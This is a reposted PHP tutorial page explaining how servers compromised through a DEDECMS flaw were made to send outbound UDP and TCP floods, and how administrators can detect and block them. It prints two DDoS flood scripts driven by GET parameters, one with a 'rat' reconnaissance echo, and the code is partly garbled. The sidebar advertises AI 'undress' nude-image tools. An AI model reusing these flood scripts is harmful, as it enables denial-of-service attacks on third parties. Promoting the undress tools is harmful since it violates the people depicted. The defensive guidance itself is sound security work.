php对外发包引发服务器崩溃的终极解决办法分享-PHP Tutorial-php.cn

Home

Backend Development

PHP Tutorial

php对外发包引发服务器崩溃的终极解决办法分享

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 13, 2016 am 10:31 AM

exec php server time

php对外发包引发服务器崩溃的终极解决方法分享

php对外发包引发服务器崩溃的终极解决方法分享
2011年12月28日
　　总结DEDECMS php对外发包引发服务器崩溃的终极解决方法，希望可以帮助客户解决服务器问题，让网站运行的更好
　　一、php对外发包分析
　　用php代码调用sockets,直接用服务器的网络攻击别的IP,常见代码如下:
　　以下是代码片段：
　　$packets = 0;
　　$ip = $_GET[\'ip\'];
　　$rand = $_GET[\'port\'];
　　set_time_limit(0);
　　ignore_user_abort(FALSE);
　　$exec_time = $_GET[\'time\'];
　　$time = time();
　　print \'Flooded: $ip on port $rand
　　\';
　　$max_time = $time+$exec_time;
　　for($i=0;$i $max_time){
　　break;
　　}
　　$fp = fsockopen(\'udp://$ip\', $rand, $errno, $errstr, 5);
　　if($fp){
　　fwrite($fp, $out);
　　fclose($fp);
　　}
　　}
　　echo \'Packet complete at \'.time(\'h:i:s\').\' with
　　$packets (\' . round(($packets*65)/1024, 2) . \' mB) packets averaging \'.
　　round($packets/$exec_time, 2) . \' packets/s \\n\';
　　?>
　　二、表现特征
　　一打开IIS,服务器的流出带宽就用光-----就是说服务器不断向别人发包,这个情况和受到DDOS攻击是不同的,DDOS是服务器不断收到大量数据包.
　　近期由于DEDECMS出现漏洞而导致大量服务器出现这个问题.
　　如何快速找到这些站?
　　你可以打开日志
　　C:\Windows\System32\LogFiles\HTTPERR\httperr...log,打开今天时间的文件,
　　里面有类似这样的记录:
　　2011-04-26 06:37:28 58.255.112.112 26817 98.126.247.13 80 HTTP/1.1 GET /xxxx/xxxxxx.php?host=122.224.32.100&port=445&time=120 503 783 Disabled 30_FreeHost_1
　　最后三项 783 Disabled 30_FreeHost_1
　　783就是这个站在IIS中的ID
　　30_FreeHost_1就是所在池
　　三、解决办法
　　1.按上述找到这个网站后停止它.或停止池,并重启IIS.
　　2.在IP策略,或防火墙中,禁止所有udp向外发送
　　为了解决这个问题,你也可以调整IP策略,限制udp只能访问特定的DNS服务器IP,如8.8.8.8,除非黑客攻击这个IP,不然攻击也是无效的,你可以在网卡DNS中设置一个你才知道的DNS IP,并且不要公开,然后调用IP策略中的udp open部分就可以解决.(打开IP策略的属性,双击open,将open中的两条udp记录删除任意一条,在保留的这条中,双击,改成地址从源地址任何地址到目标地址 '特定IP 这个IP就是设置为你自己的DNS IP,如8.8.8.8' 保存后就行了 )
　　3.用一流信息监控,在SQL拦截及网址拦截中,拦截port=这个关键词(其他关键词可以删除.)
　　4.也可以直接禁止上面的代码,如改win\php.ini后重启IIS
　　ignore_user_abort = On
　　(注意前面的;号要删除)
　　disable_functions =exec,system,passthru,popen,pclose,shell_exec,proc_open,curl_exec,multi_exec,dl,chmod,stream_socket_server,popepassthru,pfsockopen,gzinflate,
　　在后面加上
　　fsockopen,set_time_limit
　　但这样会造成很多php程序都不正常.
　　另外,这也表明你的服务器安全做得不错,如果能入侵.黑客就直接提权了,还DOS做什么?
　　近期已有新的基于TCP攻击的PHPDDOS代码如下：
　　以下是代码片段：
　　set_time_limit(999999);
　　$host = $_GET['host'];
　　$port = $_GET['port'];
　　$exec_time = $_GET['time'];
　　$packets = 64;
　　ignore_user_abort(True);
　　if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
　　if (StrLen($_GET['rat'])0){
　　echo $_GET['rat'].$_SERVER['HTTP_HOST'].'|'.GetHostByName($_SERVER['SERVER_NAME']).'|'.
　　php_uname().'|'.$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
　　exit;
　　}
　　exit;
　　}
　　$max_time = time()+$exec_time;
　　while(1){
　　$packets++;
　　if(time() > $max_time or $exec_time != 69){
　　break;
　　}
　　$fp = fsockopen('tcp://$host', $port, $errno, $errstr, 0);
　　}
　　?>
　　同样，可以采有以下解决办法：
　　1.也可以直接禁止上面的代码,如改win\php.ini后重启IIS
　　ignore_user_abort = On
　　(注意前面的;号要删除)
　　disable_functions =exec,system,passthru,popen,pclose,shell_exec,proc_open,curl_exec,multi_exec,dl,chmod,stream_socket_server,popepassthru,pfsockopen,gzinflate,
　　在后面加上
　　fsockopen,set_time_limit
　　但这样会造成很多php程序都不正常. 如果您是IDC，给客户提供空间的，禁用函数可能导致客户程序无法运行，所以一般不要用此办法
　　2.在IP策略中禁止所有外访的TCP数据包，但这样会造成的采集功能无效，也不能用在主控服务器上。
　　3.在服务器要用关键词tcp:或udp:搜索所有php类文件，找到攻击文件，删除它。

Statement of this Website

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Hot AI Tools

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress images for free

Clothoff.io

AI clothes remover

Video Face Swap

Swap faces in any video effortlessly with our completely free AI face swap tool!

Hot Article

How to fix KB5055523 fails to install in Windows 11?

4 weeks ago By DDD

How to fix KB5055518 fails to install in Windows 10?

4 weeks ago By DDD

Roblox: Grow A Garden - Complete Mutation Guide

3 weeks ago By DDD

Roblox: Bubble Gum Simulator Infinity - How To Get And Use Royal Keys

3 weeks ago By 尊渡假赌尊渡假赌尊渡假赌

How to fix KB5055612 fails to install in Windows 10?

3 weeks ago By DDD

Hot Tools

Notepad++7.3.1

Easy-to-use and free code editor

SublimeText3 Chinese version

Chinese version, very easy to use

Zend Studio 13.0.1

Powerful PHP integrated development environment

Dreamweaver CS6

Visual web development tools

SublimeText3 Mac version

God-level code editing software (SublimeText3)

Hot Topics

Java Tutorial

1664

CakePHP Tutorial

1422

Laravel Tutorial

1316

PHP Tutorial

1267

C# Tutorial

1239

Related knowledge

Explain JSON Web Tokens (JWT) and their use case in PHP APIs. Apr 05, 2025 am 12:04 AM

JWT is an open standard based on JSON, used to securely transmit information between parties, mainly for identity authentication and information exchange. 1. JWT consists of three parts: Header, Payload and Signature. 2. The working principle of JWT includes three steps: generating JWT, verifying JWT and parsing Payload. 3. When using JWT for authentication in PHP, JWT can be generated and verified, and user role and permission information can be included in advanced usage. 4. Common errors include signature verification failure, token expiration, and payload oversized. Debugging skills include using debugging tools and logging. 5. Performance optimization and best practices include using appropriate signature algorithms, setting validity periods reasonably,

Explain late static binding in PHP (static::). Apr 03, 2025 am 12:04 AM

Static binding (static::) implements late static binding (LSB) in PHP, allowing calling classes to be referenced in static contexts rather than defining classes. 1) The parsing process is performed at runtime, 2) Look up the call class in the inheritance relationship, 3) It may bring performance overhead.

PHP Program to Count Vowels in a String Feb 07, 2025 pm 12:12 PM

A string is a sequence of characters, including letters, numbers, and symbols. This tutorial will learn how to calculate the number of vowels in a given string in PHP using different methods. The vowels in English are a, e, i, o, u, and they can be uppercase or lowercase. What is a vowel? Vowels are alphabetic characters that represent a specific pronunciation. There are five vowels in English, including uppercase and lowercase: a, e, i, o, u Example 1 Input: String = "Tutorialspoint" Output: 6 explain The vowels in the string "Tutorialspoint" are u, o, i, a, o, i. There are 6 yuan in total

What are PHP magic methods (__construct, __destruct, __call, __get, __set, etc.) and provide use cases? Apr 03, 2025 am 12:03 AM

What are the magic methods of PHP? PHP's magic methods include: 1.\_\_construct, used to initialize objects; 2.\_\_destruct, used to clean up resources; 3.\_\_call, handle non-existent method calls; 4.\_\_get, implement dynamic attribute access; 5.\_\_set, implement dynamic attribute settings. These methods are automatically called in certain situations, improving code flexibility and efficiency.

PHP and Python: Comparing Two Popular Programming Languages Apr 14, 2025 am 12:13 AM

PHP and Python each have their own advantages, and choose according to project requirements. 1.PHP is suitable for web development, especially for rapid development and maintenance of websites. 2. Python is suitable for data science, machine learning and artificial intelligence, with concise syntax and suitable for beginners.

PHP in Action: Real-World Examples and Applications Apr 14, 2025 am 12:19 AM

PHP is widely used in e-commerce, content management systems and API development. 1) E-commerce: used for shopping cart function and payment processing. 2) Content management system: used for dynamic content generation and user management. 3) API development: used for RESTful API development and API security. Through performance optimization and best practices, the efficiency and maintainability of PHP applications are improved.

PHP: A Key Language for Web Development Apr 13, 2025 am 12:08 AM

PHP is a scripting language widely used on the server side, especially suitable for web development. 1.PHP can embed HTML, process HTTP requests and responses, and supports a variety of databases. 2.PHP is used to generate dynamic web content, process form data, access databases, etc., with strong community support and open source resources. 3. PHP is an interpreted language, and the execution process includes lexical analysis, grammatical analysis, compilation and execution. 4.PHP can be combined with MySQL for advanced applications such as user registration systems. 5. When debugging PHP, you can use functions such as error_reporting() and var_dump(). 6. Optimize PHP code to use caching mechanisms, optimize database queries and use built-in functions. 7

Explain the match expression (PHP 8 ) and how it differs from switch. Apr 06, 2025 am 12:03 AM

In PHP8, match expressions are a new control structure that returns different results based on the value of the expression. 1) It is similar to a switch statement, but returns a value instead of an execution statement block. 2) The match expression is strictly compared (===), which improves security. 3) It avoids possible break omissions in switch statements and enhances the simplicity and readability of the code.

See all articles